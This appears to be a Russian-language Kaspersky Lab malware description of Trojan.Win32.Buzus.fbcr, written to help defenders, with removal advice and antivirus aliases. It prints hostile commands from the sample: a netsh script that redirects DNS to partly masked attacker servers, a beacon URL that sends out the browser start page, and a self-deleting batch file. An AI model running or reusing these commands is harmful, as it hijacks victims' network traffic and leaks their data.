Trojan.Win32.Buzus.fbcr

Время детектирования	09 авг 2010 16:19 MSK
Время выпуска обновления	10 авг 2010 00:58 MSK
Описание опубликовано	26 окт 2010 14:21 MSK

Экспертное описание Автоматическое описание

Это описание создано экспертами «Лаборатории Касперского» и содержит наиболее точную информацию о данном детектируемом объекте.

Технические детали
Деструктивная активность
Рекомендации по удалению

Технические детали

Троянская программа, выполняющая деструктивные действия на компьютере пользователя. Программа является приложением Windows (PE EXE-файл). Имеет размер 585661 байт. Написана на Delphi.

Деструктивная активность

Основное окно программы имеет следующий вид:

После запуска троянец выполняет следующие действия:

В случае обнаружения следующих процессов завершает свою работу:
```
VMwareUser.exe
VMwareService.exe
VMwareTray.exe
```
Проверяет наличие ключа системного реестра (предположительно создается другими вредоносными программами):
```
[HKLM\Software\Microsoft\HTTP_UPDATE]
```
Выполняет перемещение файлов: Для "Windows XP" и "Windows 2003":
```
%Documents and Settings%\All Users\Templates\Directdb.xml
```
Для "Windows Vista" и "Windows 7":
```
%Temporary Internet Files%\Directdb.xml
```
Перемещает вышеуказанные файлы соответственно под следующими именами:
```
%Documents and Settings%\All Users\Templates\qweoi.tmp
%Temporary Internet Files%\qweoi.tmp
```
После чего выполняет отложенное удаление этих файлов (происхождение или принадлежность удаляемых файлов к тем или иным приложениям установить не удалось).
Удаляет следующие файлы (происхождение или принадлежность удаляемых файлов к тем или иным приложениям установить не удалось):
```
C:\RECYCLER\Update.exe
C:\RECYCLER\UpdateSet.exe
```
Выводит следующее сообщение об ошибке:

Также троянец запускает две копии своего тела, в которые внедряет код из своих ресурсов.

Размер внедряемого кода в первую копию составляет 99328 байт и детектируется Антивирусом Касперского как Trojan-Downloader.Win32.Agent.eisi. Внедренный код выполняет следующие действия:

Удаляет файл:
```
<X>:\tmp.log
```
где <X> - буква системного диска.
Выполняет команду:
```
ipconfig.exe /all >C:\tmp.log
```
Вышеуказанная команда позволяет сохранить настройки протокола IP для Windows в файл "C:\tmp.log".
Переписывает содержимое файла "C:\tmp.log" следующими строками:
```
pushd interface ip
set dns name="<name>" source=static addr=121.***.
240 register=PRIMARY
add dns name="<name>" addr=125.***.219 index=2
set wins name="<name>" source=static addr=none
popd
```
где <name> - имя сетевого подключения, например "Local Area Connection". И выполняет следующую команду:
```
netsh.exe -f C:\tmp.log
```
Что приводит к изменению адресов основного и дополнительного DNS-серверов и как следствие перенаправлению все DNS запросов на указанные адреса (метод изменения DNS серверов реализован таким образом, что он работает лишь на тех системах, где строка "Ethernet adapter" при выполнении команды "ipconfig /all", не локализована, т.е. не переведена на национальный язык. Так, например, данный метод не работает для русской локализации, т.к. вышеуказанная строка не встречается при выводе команды "ipconfig /all", а вместо нее отображается локализованная строка "Ethernet адаптер").
Завершает процесс с именем:
```
ipconfig.exe
```
Отправляет запрос на следующий адрес:
```
http://www.qq***nead.com/GetServer.asp?Mac=<StartPage>&otherInfo=ok
```
где <StartPage> - значение стартовой страницы, полученное из следующего ключа реестра:
```
[HKCU\Software\Microsoft\Internet Explorer\Main\Start Page]
```
Создает каталог:
```
C:\RECYCLER\
```
куда перемещает свое тело под именем:
```
Temp.dat
```
и выполняет отложенное удаление этого файла.

Размер внедряемого кода во вторую копию составляет 479232 байта.

Внедренный код выполняет следующие действия:

Обращается на следующий ресурс, используя GET запрос:
```
http://yuanfa***43759.com/xg/updateinfo.htm
```
На момент создания описания вышеуказанный ресурс был недоступен. Данные полученные в ответ на запрос проверяются на содержание затребованных данных (статус код ответа равен 200), а также на содержание строки
```
Start
```
После чего выполняется обработка полученных данных (предположительно получаемые данные содержат список, возможно URL адресов, т.к. в коде отвечающим за обработку полученных данных виден многократный поиск разделителей, сам же механизм обработки получаемых данных изучить не удалось, т.к. ресурс более недоступен, а сам механизм завязан на получаемые данные).
В случае если ответ от сервера по вышеуказанному адресу, не содержит затребованных данных, то в рабочем каталоге создается файл "infmantion.bat", который содержит следующие строки:
```
:try
del /q /f "<Путь_к_оригинальному_телу_троянца>"
if exist <Путь_к_оригинальному_телу_троянца> goto try
del %0
```

Выполнение этого файла приводит к удалению тела троянца.

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

При помощи Диспетчера задач завершить вредоносный процесс.
Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
Удалить файл:
```
%Temp%\
<X>:\tmp.log
```
где <X> - буква системного диска.
Восстановить оригинальные значения основного и дополнительного DNS-серверов, адреса которых можно получить у системного администратора вашей сети.
Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).

Печать

Закладки

Вредоносные программы

Троянские программы

Trojan

Вредоносная программа, предназначенная для осуществления несанкционированных пользователем действий, влекущих уничтожение, блокирование, модификацию или копирование информации, нарушение работы компьютеров или компьютерных сетей, и при всём при этом не попадающая ни под одно из других троянских поведений.

К Trojan также относятся «многоцелевые» троянские программы, т.е. программы, способные совершать сразу несколько несанкционированных пользователем действий, присущих одновременно нескольким другим поведениям троянских программ, что не позволяет однозначно отнести их к тому или иному поведению.

Другие модификации

Trojan.Win32.Buzus.apgf

Trojan.Win32.Buzus.hjzy

Другие названия

Trojan.Win32.Buzus.fbcr («Лаборатория Касперского») также известен как:

Trojan: Generic.dx!tio (McAfee)
Mal/Packer (Sophos)
Trojan.PcClient-2361 (ClamAV)
Trj/Buzus.AH (Panda)
W32/Heuristic-210!Eldorado (FPROT)
Trojan:Win32/Remhead (MS(OneCare))
Trojan.DownLoader1.35450 (DrWeb)
a variant of Win32/TrojanDownloader.Agent.TGOQCW trojan (Nod32)
Trojan.Generic.4561194 (BitDef7)
Trojan.Generic.4555152 (BitDef7)
Trojan.Generic.4560739 (BitDef7)
Trojan.Agent.Delf.ROH (BitDef7)
Packed/NSPack (VirusBuster)
Win32:Malware-gen (AVAST)
Backdoor.Win32.GrayBird.ej (Ikarus)
Generic18.BKUU (AVG)
TR/ATRAPS.Gen (AVIRA)
W32/Packed_NsPack.I (Norman)
Trojan.Win32.Generic.52262102 (Rising)
Trojan.Win32.Generic.52259EAA (Rising)
Trojan.Win32.Generic.52259B43 (Rising)
Trojan.Win32.Buzus.fbcr [AVP] (FSecure)
Trojan.Win32.Buzus (Sunbelt)
Packed/NSPack (VirusBusterBeta)

© ЗАО «Лаборатория Касперского», 1997-2013
Ведущий производитель систем защиты от вирусов, спама и хакерских атак
Зарегистрированные товарные знаки и знаки обслуживания являются собственностью их правообладателей.
Мнение авторов может не совпадать с официальной позицией «Лаборатории Касперского».